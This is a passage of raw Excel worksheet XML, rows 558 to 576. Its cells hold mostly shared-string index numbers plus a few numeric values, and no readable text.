      <c r="H558" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I558" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J558" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K558" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L558" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M558" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N558" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O558" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P558" s="12" t="s">
        <v>4326</v>
      </c>
      <c r="Q558" s="12">
        <v>2.6</v>
      </c>
      <c r="R558" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S558" s="12" t="s">
        <v>4327</v>
      </c>
      <c r="T558" s="12" t="s">
        <v>4240</v>
      </c>
      <c r="U558" s="12" t="s">
        <v>2432</v>
      </c>
      <c r="V558" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W558" s="12" t="s">
        <v>4328</v>
      </c>
      <c r="X558" s="12">
        <v>11</v>
      </c>
      <c r="Y558" s="12" t="s">
        <v>4329</v>
      </c>
    </row>
    <row r="559" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A559" s="12">
        <v>2404</v>
      </c>
      <c r="B559" s="12" t="s">
        <v>30451</v>
      </c>
      <c r="D559" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E559" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F559" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G559" s="12" t="s">
        <v>4330</v>
      </c>
      <c r="H559" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I559" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J559" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K559" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L559" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M559" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N559" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O559" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P559" s="12" t="s">
        <v>3434</v>
      </c>
      <c r="Q559" s="12">
        <v>2.4</v>
      </c>
      <c r="R559" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S559" s="12" t="s">
        <v>4331</v>
      </c>
      <c r="T559" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="U559" s="12" t="s">
        <v>4332</v>
      </c>
      <c r="V559" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W559" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X559" s="12">
        <v>2</v>
      </c>
      <c r="Y559" s="12" t="s">
        <v>4333</v>
      </c>
    </row>
    <row r="560" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A560" s="12">
        <v>2408</v>
      </c>
      <c r="B560" s="12" t="s">
        <v>28808</v>
      </c>
      <c r="C560" s="12" t="s">
        <v>29784</v>
      </c>
      <c r="D560" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E560" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F560" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G560" s="12" t="s">
        <v>4335</v>
      </c>
      <c r="H560" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I560" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J560" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K560" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L560" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M560" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N560" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O560" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P560" s="12" t="s">
        <v>4336</v>
      </c>
      <c r="Q560" s="12">
        <v>2.6</v>
      </c>
      <c r="R560" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S560" s="12" t="s">
        <v>4337</v>
      </c>
      <c r="T560" s="12" t="s">
        <v>57</v>
      </c>
      <c r="U560" s="12" t="s">
        <v>4338</v>
      </c>
      <c r="V560" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W560" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X560" s="12">
        <v>4</v>
      </c>
      <c r="Y560" s="12" t="s">
        <v>4339</v>
      </c>
    </row>
    <row r="561" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A561" s="12">
        <v>2409</v>
      </c>
      <c r="B561" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C561" s="12" t="s">
        <v>29781</v>
      </c>
      <c r="D561" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E561" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F561" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G561" s="12" t="s">
        <v>4340</v>
      </c>
      <c r="H561" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I561" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J561" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K561" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L561" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M561" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N561" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O561" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P561" s="12" t="s">
        <v>4336</v>
      </c>
      <c r="Q561" s="12">
        <v>2.6</v>
      </c>
      <c r="R561" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S561" s="12" t="s">
        <v>4341</v>
      </c>
      <c r="T561" s="12" t="s">
        <v>57</v>
      </c>
      <c r="U561" s="12" t="s">
        <v>4342</v>
      </c>
      <c r="V561" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="W561" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X561" s="12">
        <v>4</v>
      </c>
      <c r="Y561" s="12" t="s">
        <v>4343</v>
      </c>
    </row>
    <row r="562" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A562" s="12">
        <v>2412</v>
      </c>
      <c r="B562" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C562" s="12" t="s">
        <v>28818</v>
      </c>
      <c r="D562" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F562" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G562" s="12" t="s">
        <v>4344</v>
      </c>
      <c r="H562" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I562" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J562" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K562" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L562" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M562" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N562" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O562" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P562" s="12" t="s">
        <v>4345</v>
      </c>
      <c r="Q562" s="12">
        <v>2.6</v>
      </c>
      <c r="R562" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S562" s="12" t="s">
        <v>4346</v>
      </c>
      <c r="T562" s="12" t="s">
        <v>4347</v>
      </c>
      <c r="U562" s="12" t="s">
        <v>4348</v>
      </c>
      <c r="V562" s="12" t="s">
        <v>48</v>
      </c>
      <c r="W562" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X562" s="12">
        <v>17</v>
      </c>
      <c r="Y562" s="12" t="s">
        <v>4349</v>
      </c>
    </row>
    <row r="563" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A563" s="12">
        <v>2421</v>
      </c>
      <c r="B563" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D563" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E563" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F563" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G563" s="12" t="s">
        <v>4350</v>
      </c>
      <c r="H563" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I563" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J563" s="12" t="s">
        <v>458</v>
      </c>
      <c r="K563" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L563" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M563" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N563" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O563" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P563" s="12" t="s">
        <v>4198</v>
      </c>
      <c r="Q563" s="12">
        <v>2.6</v>
      </c>
      <c r="R563" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S563" s="12" t="s">
        <v>4351</v>
      </c>
      <c r="T563" s="12" t="s">
        <v>1591</v>
      </c>
      <c r="U563" s="12" t="s">
        <v>4352</v>
      </c>
      <c r="V563" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W563" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X563" s="12">
        <v>27</v>
      </c>
      <c r="Y563" s="12" t="s">
        <v>4353</v>
      </c>
    </row>
    <row r="564" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A564" s="12">
        <v>2423</v>
      </c>
      <c r="B564" s="12" t="s">
        <v>28820</v>
      </c>
      <c r="D564" s="12" t="s">
        <v>28819</v>
      </c>
      <c r="E564" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F564" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G564" s="12" t="s">
        <v>4354</v>
      </c>
      <c r="H564" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I564" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J564" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K564" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L564" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M564" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N564" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O564" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P564" s="12" t="s">
        <v>4355</v>
      </c>
      <c r="Q564" s="12">
        <v>2.6</v>
      </c>
      <c r="R564" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S564" s="12" t="s">
        <v>4356</v>
      </c>
      <c r="T564" s="12" t="s">
        <v>4357</v>
      </c>
      <c r="U564" s="12" t="s">
        <v>4358</v>
      </c>
      <c r="V564" s="12" t="s">
        <v>2992</v>
      </c>
      <c r="W564" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X564" s="12">
        <v>5</v>
      </c>
      <c r="Y564" s="12" t="s">
        <v>4359</v>
      </c>
    </row>
    <row r="565" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A565" s="12">
        <v>2425</v>
      </c>
      <c r="B565" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C565" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D565" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E565" s="12" t="s">
        <v>31436</v>
      </c>
      <c r="F565" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G565" s="12" t="s">
        <v>4360</v>
      </c>
      <c r="H565" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I565" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J565" s="12" t="s">
        <v>458</v>
      </c>
      <c r="K565" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L565" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M565" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N565" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O565" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P565" s="12" t="s">
        <v>4198</v>
      </c>
      <c r="Q565" s="12">
        <v>2.6</v>
      </c>
      <c r="R565" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S565" s="12" t="s">
        <v>4361</v>
      </c>
      <c r="T565" s="12" t="s">
        <v>4362</v>
      </c>
      <c r="U565" s="12" t="s">
        <v>4363</v>
      </c>
      <c r="V565" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W565" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X565" s="12">
        <v>5</v>
      </c>
      <c r="Y565" s="12" t="s">
        <v>4364</v>
      </c>
    </row>
    <row r="566" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A566" s="12">
        <v>2429</v>
      </c>
      <c r="B566" s="12" t="s">
        <v>28821</v>
      </c>
      <c r="D566" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F566" s="12" t="s">
        <v>29757</v>
      </c>
      <c r="G566" s="12" t="s">
        <v>4365</v>
      </c>
      <c r="H566" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I566" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J566" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K566" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L566" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M566" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N566" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O566" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P566" s="12" t="s">
        <v>3391</v>
      </c>
      <c r="Q566" s="12">
        <v>2.6</v>
      </c>
      <c r="R566" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S566" s="12" t="s">
        <v>4366</v>
      </c>
      <c r="T566" s="12" t="s">
        <v>4367</v>
      </c>
      <c r="U566" s="12" t="s">
        <v>4368</v>
      </c>
      <c r="V566" s="12" t="s">
        <v>100</v>
      </c>
      <c r="W566" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X566" s="12">
        <v>0</v>
      </c>
      <c r="Y566" s="12" t="s">
        <v>4369</v>
      </c>
    </row>
    <row r="567" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A567" s="12">
        <v>2440</v>
      </c>
      <c r="B567" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C567" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D567" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E567" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F567" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G567" s="12" t="s">
        <v>4376</v>
      </c>
      <c r="H567" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I567" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J567" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K567" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L567" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M567" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N567" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O567" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P567" s="12" t="s">
        <v>4198</v>
      </c>
      <c r="Q567" s="12">
        <v>2.6</v>
      </c>
      <c r="R567" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S567" s="12" t="s">
        <v>4377</v>
      </c>
      <c r="T567" s="12" t="s">
        <v>4244</v>
      </c>
      <c r="U567" s="12" t="s">
        <v>4378</v>
      </c>
      <c r="V567" s="12" t="s">
        <v>197</v>
      </c>
      <c r="W567" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X567" s="12">
        <v>1</v>
      </c>
      <c r="Y567" s="12" t="s">
        <v>4379</v>
      </c>
    </row>
    <row r="568" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A568" s="12">
        <v>2443</v>
      </c>
      <c r="B568" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C568" s="12" t="s">
        <v>28822</v>
      </c>
      <c r="D568" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E568" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F568" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G568" s="12" t="s">
        <v>4380</v>
      </c>
      <c r="H568" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I568" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J568" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K568" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L568" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M568" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N568" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O568" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P568" s="12" t="s">
        <v>3391</v>
      </c>
      <c r="Q568" s="12">
        <v>2.6</v>
      </c>
      <c r="R568" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S568" s="12" t="s">
        <v>4381</v>
      </c>
      <c r="T568" s="12" t="s">
        <v>4382</v>
      </c>
      <c r="U568" s="12" t="s">
        <v>4383</v>
      </c>
      <c r="V568" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="W568" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X568" s="12">
        <v>7</v>
      </c>
      <c r="Y568" s="12" t="s">
        <v>4384</v>
      </c>
    </row>
    <row r="569" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A569" s="12">
        <v>2457</v>
      </c>
      <c r="B569" s="12" t="s">
        <v>28824</v>
      </c>
      <c r="D569" s="12" t="s">
        <v>28823</v>
      </c>
      <c r="E569" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F569" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G569" s="12" t="s">
        <v>4393</v>
      </c>
      <c r="H569" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I569" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J569" s="12" t="s">
        <v>201</v>
      </c>
      <c r="K569" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L569" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M569" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N569" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O569" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P569" s="12" t="s">
        <v>4394</v>
      </c>
      <c r="Q569" s="12">
        <v>2.6</v>
      </c>
      <c r="R569" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S569" s="12" t="s">
        <v>4395</v>
      </c>
      <c r="T569" s="12" t="s">
        <v>4396</v>
      </c>
      <c r="U569" s="12" t="s">
        <v>4397</v>
      </c>
      <c r="V569" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="W569" s="12">
        <v>2519</v>
      </c>
      <c r="X569" s="12">
        <v>5</v>
      </c>
      <c r="Y569" s="12" t="s">
        <v>4398</v>
      </c>
    </row>
    <row r="570" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A570" s="12">
        <v>2461</v>
      </c>
      <c r="B570" s="12" t="s">
        <v>28808</v>
      </c>
      <c r="C570" s="12" t="s">
        <v>28810</v>
      </c>
      <c r="D570" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F570" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G570" s="12" t="s">
        <v>4399</v>
      </c>
      <c r="H570" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I570" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J570" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K570" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L570" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M570" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N570" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O570" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P570" s="12" t="s">
        <v>3994</v>
      </c>
      <c r="Q570" s="12">
        <v>2.6</v>
      </c>
      <c r="R570" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S570" s="12" t="s">
        <v>4400</v>
      </c>
      <c r="T570" s="12" t="s">
        <v>4401</v>
      </c>
      <c r="U570" s="12" t="s">
        <v>4402</v>
      </c>
      <c r="V570" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W570" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X570" s="12">
        <v>27</v>
      </c>
      <c r="Y570" s="12" t="s">
        <v>4403</v>
      </c>
    </row>
    <row r="571" spans="1:25" ht="13.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A571" s="12">
        <v>2465</v>
      </c>
      <c r="B571" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D571" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E571" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F571" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G571" s="12" t="s">
        <v>4404</v>
      </c>
      <c r="H571" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I571" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J571" s="12" t="s">
        <v>2575</v>
      </c>
      <c r="K571" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L571" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M571" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N571" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O571" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P571" s="12" t="s">
        <v>3391</v>
      </c>
      <c r="Q571" s="12">
        <v>2.6</v>
      </c>
      <c r="R571" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S571" s="12" t="s">
        <v>4405</v>
      </c>
      <c r="T571" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="U571" s="12" t="s">
        <v>2576</v>
      </c>
      <c r="V571" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W571" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X571" s="12">
        <v>2</v>
      </c>
      <c r="Y571" s="12" t="s">
        <v>4406</v>
      </c>
    </row>
    <row r="572" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A572" s="12">
        <v>2466</v>
      </c>
      <c r="B572" s="12" t="s">
        <v>28825</v>
      </c>
      <c r="D572" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F572" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G572" s="12" t="s">
        <v>4407</v>
      </c>
      <c r="H572" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I572" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J572" s="12" t="s">
        <v>941</v>
      </c>
      <c r="K572" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L572" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M572" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N572" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O572" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P572" s="12" t="s">
        <v>4408</v>
      </c>
      <c r="Q572" s="12">
        <v>2.6</v>
      </c>
      <c r="R572" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S572" s="12" t="s">
        <v>4409</v>
      </c>
      <c r="T572" s="12" t="s">
        <v>4410</v>
      </c>
      <c r="U572" s="12" t="s">
        <v>4411</v>
      </c>
      <c r="V572" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W572" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X572" s="12">
        <v>1</v>
      </c>
      <c r="Y572" s="12" t="s">
        <v>4412</v>
      </c>
    </row>
    <row r="573" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A573" s="12">
        <v>2474</v>
      </c>
      <c r="B573" s="12" t="s">
        <v>28828</v>
      </c>
      <c r="D573" s="12" t="s">
        <v>28826</v>
      </c>
      <c r="E573" s="12" t="s">
        <v>31445</v>
      </c>
      <c r="F573" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G573" s="12" t="s">
        <v>4414</v>
      </c>
      <c r="H573" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I573" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J573" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K573" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L573" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M573" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N573" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O573" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P573" s="12" t="s">
        <v>4296</v>
      </c>
      <c r="Q573" s="12">
        <v>2.6</v>
      </c>
      <c r="R573" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S573" s="12" t="s">
        <v>4415</v>
      </c>
      <c r="T573" s="12" t="s">
        <v>4416</v>
      </c>
      <c r="U573" s="12" t="s">
        <v>4417</v>
      </c>
      <c r="V573" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W573" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X573" s="12">
        <v>2</v>
      </c>
      <c r="Y573" s="12" t="s">
        <v>4418</v>
      </c>
    </row>
    <row r="574" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A574" s="12">
        <v>2484</v>
      </c>
      <c r="B574" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C574" s="12" t="s">
        <v>28827</v>
      </c>
      <c r="D574" s="12" t="s">
        <v>28815</v>
      </c>
      <c r="F574" s="12" t="s">
        <v>29758</v>
      </c>
      <c r="G574" s="12" t="s">
        <v>4419</v>
      </c>
      <c r="H574" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I574" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J574" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K574" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L574" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M574" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N574" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O574" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P574" s="12" t="s">
        <v>3391</v>
      </c>
      <c r="Q574" s="12">
        <v>2.6</v>
      </c>
      <c r="R574" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S574" s="12" t="s">
        <v>4420</v>
      </c>
      <c r="T574" s="12" t="s">
        <v>3881</v>
      </c>
      <c r="U574" s="12" t="s">
        <v>4421</v>
      </c>
      <c r="V574" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W574" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X574" s="12">
        <v>4</v>
      </c>
      <c r="Y574" s="12" t="s">
        <v>4422</v>
      </c>
    </row>
    <row r="575" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A575" s="12">
        <v>2487</v>
      </c>
      <c r="B575" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D575" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F575" s="12" t="s">
        <v>29761</v>
      </c>
      <c r="G575" s="12" t="s">
        <v>4423</v>
      </c>
      <c r="H575" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I575" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J575" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K575" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L575" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M575" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N575" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O575" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P575" s="12" t="s">
        <v>3994</v>
      </c>
      <c r="Q575" s="12">
        <v>2.6</v>
      </c>
      <c r="R575" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S575" s="12" t="s">
        <v>4424</v>
      </c>
      <c r="T575" s="12" t="s">
        <v>4425</v>
      </c>
      <c r="U575" s="12" t="s">
        <v>4426</v>
      </c>
      <c r="V575" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="W575" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X575" s="12">
        <v>24</v>
      </c>
      <c r="Y575" s="12" t="s">
        <v>4427</v>
      </c>
    </row>
    <row r="576" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A576" s="12">
        <v>2490</v>
      </c>
      <c r="B576" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D576" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E576" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F576" s="12" t="s">
        <v>29761</v>
      </c>
      <c r="G576" s="12" t="s">
        <v>4428</v>
      </c>
      <c r="H576" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I576" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J576" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K576" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L576" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M576" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N576" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O576" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P576" s="12" t="s">
        <v>3391</v>
      </c>
      <c r="Q576" s="12">
        <v>2.6</v>
      </c>
      <c r="R576" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S576" s="12" t="s">
        <v>4429</v>
      </c>
      <c r="T576" s="12" t="s">
        <v>68</v>
      </c>
      <c r="U576" s="12" t="s">
        <v>4430</v>
      </c>
      <c r="V576" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W576" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X576" s="12">
        <v>12</v>
      </c>
      <c r="Y576" s="12" t="s">
        <v>4431</v>
      </c>
    </row>
